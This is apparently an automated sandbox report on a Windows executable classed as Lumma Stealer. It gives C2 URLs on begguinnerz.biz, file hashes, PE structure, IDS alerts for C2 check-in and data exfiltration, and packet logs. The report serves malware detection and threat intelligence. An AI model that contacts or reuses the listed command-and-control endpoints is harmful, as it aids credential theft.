http://crl.rootca1.amazontrust.com/rootca1.crl0	yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/	yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CF0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3103760132.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036076109.0000000001CDB000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114571173.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/apiocal	yTcaknrrb8.exe, 00000000.00000002.3114349117.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3079860899.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/apix	yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D3F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/Z	yTcaknrrb8.exe, 00000000.00000002.3114877720.0000000008B12000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	yTcaknrrb8.exe, 00000000.00000003.3063100244.0000000008B4B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/pi	yTcaknrrb8.exe, 00000000.00000003.3113515917.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3090277095.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114571173.0000000001D5E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/gax	yTcaknrrb8.exe, 00000000.00000003.3113352753.0000000001D42000.00000004.00000020.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000002.3114514612.0000000001D42000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	yTcaknrrb8.exe, 00000000.00000003.3064034608.0000000008C3E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	yTcaknrrb8.exe, 00000000.00000003.3037067411.0000000008B5A000.00000004.00000800.00020000.00000000.sdmp, yTcaknrrb8.exe, 00000000.00000003.3036994395.0000000008B5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/api	yTcaknrrb8.exe, 00000000.00000003.3035962125.0000000001CC0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.92.91	begguinnerz.biz	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583038
Start date and time:	2025-01-01 16:51:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yTcaknrrb8.exe renamed because original name is a hash value
Original Sample Name:	617e7bf260aa05530b1470c129a4a164.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target yTcaknrrb8.exe, PID 2436 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
12:34:39	API Interceptor	7x Sleep call for process: yTcaknrrb8.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.92.91	file.exe	Get hash	malicious	LummaC Stealer	Browse	suprafox.fun/api

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
begguinnerz.biz	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.190.223
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	NewI Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	172.67.190.223

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.198.102
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	GqjiKlwarV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	172.67.220.198
	1znAXdPcM5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	104.26.13.60
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	104.21.64.1
	6a7e35.msi	Get hash	malicious	Unknown	Browse	104.21.32.1
	http://tracking.b2bmktvault.com/tracking/click?d=qPk_c18mu4tAnpVkjkvM74XnWEgCEJFMr0kmnRaZVETZIbfUm-V7axMnjqAoCLnqzaVyNRK36FUkPva8vnzGVvH9cqu1JpLb-vxN3FkjjYhK51_3JrkS14Hcuqb1FOJE1bnSPADYUAMl8knPwYz7btXcOUX9DY4_AjytTbLRGEQ0R8vUhh6vaa-KBtd0YdWGVJFQli_mKczqrYpzYk33dCMwBXQR8R8u2JajJsC51OFcIlRSs_l3i1d9MQf5ZYWuxV_Ytx1pTi2iUY6P97JH0U81	Get hash	malicious	Unknown	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Active_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.92.91
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	PASS-1234.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Launcher_x64.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Solara-Roblox-Executor-v3.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Delta.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	Active_Setup.exe	Get hash	malicious	LummaC	Browse	104.21.92.91
	SMmAznmdAa.exe	Get hash	malicious	LummaC	Browse	104.21.92.91

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.218236645809168
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yTcaknrrb8.exe
File size:	2'954'240 bytes
MD5:	617e7bf260aa05530b1470c129a4a164
SHA1:	bf605cfa0502ca6563dac9989a2b934cd018928a
SHA256:	ba4791282afac0d30759490693ac7ee8c5934c98262ffbb8d7b993d095e34bf8
SHA512:	017c180ca17a69b00ff5b3c4272b6cd4090f1175765986c672a811c8c036d75f5a24dd958637d15cb0106c2b82f974822fec1304d43d2678ce6e95337e7bcba5
SSDEEP:	49152:3UEp+lHQraGhazmclHejPuElvmoUCAwS2uYJ2pU+zh5N4JKnGM/Rs6BAXL7tCMhS:EEolHQrahzmyHejPuEl+oUdh2/JMU+zN
TLSH:	40D58CBD51D1D025E753C2F099A382194E6C23B0FBEFBAEB539838CC45635EE60A1617
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..

File Icon


Icon Hash:	8922c1b68787b609

Static PE Info

General

Entrypoint:	0x677de0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x676D7896 [Thu Dec 26 15:39:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4159edb38142459c0d592c68fcfb12bb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F19A450816Dh
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [006A9018h]
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [006A9014h]
push C0000409h
call dword ptr [006A901Ch]
push eax
call dword ptr [006A9020h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [006A9024h]
test eax, eax
je 00007F19A4508469h
mov ecx, 00000002h
int 29h
mov dword ptr [006BAE40h], eax
mov dword ptr [006BAE3Ch], ecx
mov dword ptr [006BAE38h], edx
mov dword ptr [006BAE34h], ebx
mov dword ptr [006BAE30h], esi
mov dword ptr [006BAE2Ch], edi
mov word ptr [006BAE58h], ss
mov word ptr [006BAE4Ch], cs
mov word ptr [006BAE28h], ds
mov word ptr [006BAE24h], es
mov word ptr [006BAE20h], fs
mov word ptr [006BAE1Ch], gs
pushfd
pop dword ptr [006BAE50h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [006BAE44h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [006BAE48h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [006BAE54h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b7b5c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2bd000	0x6ee5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2c4000	0x10a58	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2b6b1c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2b6b70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a9000	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a7e9a	0x2a8000	2a1659e788cdddedd8ca5ccb61cf4292	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a9000	0xf254	0xf400	0e2216d7cd3d672646b1e5d968bb2bc9	False	0.32423475922131145	data	4.584175489714902	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2b9000	0x2e88	0x1e00	49219035489a9f9092b30837e19fa649	False	0.5475260416666666	data	6.178489336728495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0x2bc000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2bd000	0x6ee5	0x7000	2c8cc342185bc72c5bb705c04b4ff6f1	False	0.5121023995535714	data	4.649865445417371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2c4000	0x10a58	0x10c00	cea5c6ef1b6e331282a1b0975bb38bcb	False	0.7311683768656716	data	6.834688528161623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2bd658	0x123e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.919271948608137
RT_MENU	0x2be898	0x210	data			0.5890151515151515
RT_MENU	0x2beaa8	0x4ea	data			0.5166931637519873
RT_MENU	0x2bef94	0x2a6	data			0.5427728613569321
RT_MENU	0x2bf23c	0x2b0	data			0.5377906976744186
RT_DIALOG	0x2bf4ec	0x3a0	data			0.5484913793103449
RT_DIALOG	0x2bf88c	0x564	data			0.486231884057971
RT_DIALOG	0x2bfdf0	0x45c	data			0.5188172043010753
RT_DIALOG	0x2c024c	0x4dc	data			0.5
RT_DIALOG	0x2c0728	0x394	data			0.509825327510917
RT_DIALOG	0x2c0abc	0x6b0	data			0.4719626168224299
RT_DIALOG	0x2c116c	0x638	data			0.4849246231155779
RT_DIALOG	0x2c17a4	0x520	data			0.5022865853658537
RT_DIALOG	0x2c1cc4	0x450	data			0.5181159420289855
RT_DIALOG	0x2c2114	0x330	data			0.5661764705882353
RT_DIALOG	0x2c2444	0x3e4	data			0.5120481927710844
RT_DIALOG	0x2c2828	0x334	data			0.5036585365853659
RT_STRING	0x2c2b5c	0xe4	data			0.6491228070175439
RT_STRING	0x2c2c40	0x194	data			0.6064356435643564
RT_STRING	0x2c2dd4	0x184	data			0.6185567010309279
RT_STRING	0x2c2f58	0x188	data			0.6122448979591837
RT_STRING	0x2c30e0	0x18c	data			0.6111111111111112
RT_STRING	0x2c326c	0x198	data			0.6078431372549019
RT_STRING	0x2c3404	0x170	data			0.592391304347826
RT_STRING	0x2c3574	0x194	data			0.6064356435643564
RT_STRING	0x2c3708	0x160	data			0.6306818181818182
RT_STRING	0x2c3868	0x1b0	data			0.6087962962962963
RT_GROUP_ICON	0x2c3a18	0x14	data			1.05
RT_VERSION	0x2c3a2c	0x33c	data			0.5072463768115942
RT_MANIFEST	0x2c3d68	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle

USER32.dll

MessageBoxA, MessageBoxW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-01T16:55:03.099386+0100	2058600	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (begguinnerz .biz)	1	192.168.2.7	63966	1.1.1.1	53	UDP
2025-01-01T16:55:03.586357+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:03.586357+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:04.055704+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:04.055704+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49971	104.21.92.91	443	TCP
2025-01-01T16:55:04.675733+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:04.675733+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:05.423180+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:05.423180+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49972	104.21.92.91	443	TCP
2025-01-01T16:55:06.189173+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49973	104.21.92.91	443	TCP
2025-01-01T16:55:06.189173+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49973	104.21.92.91	443	TCP
2025-01-01T16:55:06.717410+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49973	104.21.92.91	443	TCP
2025-01-01T16:55:07.322380+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49974	104.21.92.91	443	TCP
2025-01-01T16:55:07.322380+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49974	104.21.92.91	443	TCP
2025-01-01T16:55:08.814491+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49975	104.21.92.91	443	TCP
2025-01-01T16:55:08.814491+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49975	104.21.92.91	443	TCP
2025-01-01T16:55:10.422698+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49976	104.21.92.91	443	TCP
2025-01-01T16:55:10.422698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49976	104.21.92.91	443	TCP
2025-01-01T16:55:11.482596+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49977	104.21.92.91	443	TCP
2025-01-01T16:55:11.482596+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49977	104.21.92.91	443	TCP
2025-01-01T16:55:12.804646+0100	2058601	ET MALWARE Observed Win32/Lumma Stealer Related Domain (begguinnerz .biz in TLS SNI)	1	192.168.2.7	49978	104.21.92.91	443	TCP
2025-01-01T16:55:12.804646+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49978	104.21.92.91	443	TCP
2025-01-01T16:55:13.235145+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49978	104.21.92.91	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 16:55:03.119862080 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.119891882 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:03.119966984 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.123167992 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.123182058 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:03.586266041 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:03.586357117 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.588068008 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.588077068 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:03.588318110 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:03.635641098 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.646370888 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.646399975 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:03.646622896 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.055740118 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.055838108 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.055922985 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.131736994 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.131752968 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.131763935 CET	49971	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.131769896 CET	443	49971	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.216649055 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.216695070 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.216803074 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.217097998 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.217113972 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.675611019 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.675733089 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.676966906 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.676978111 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.677205086 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:04.678323030 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.678379059 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:04.678395033 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423166990 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423218012 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423249006 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423275948 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423276901 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.423300028 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423330069 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.423542976 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.423593044 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.423604012 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.424160957 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.424187899 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.424215078 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.424223900 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.424273014 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.428155899 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.428194046 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.428236008 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.428246975 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.479536057 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.509397030 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.509480000 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.509815931 CET	49972	443	192.168.2.7	104.21.92.91
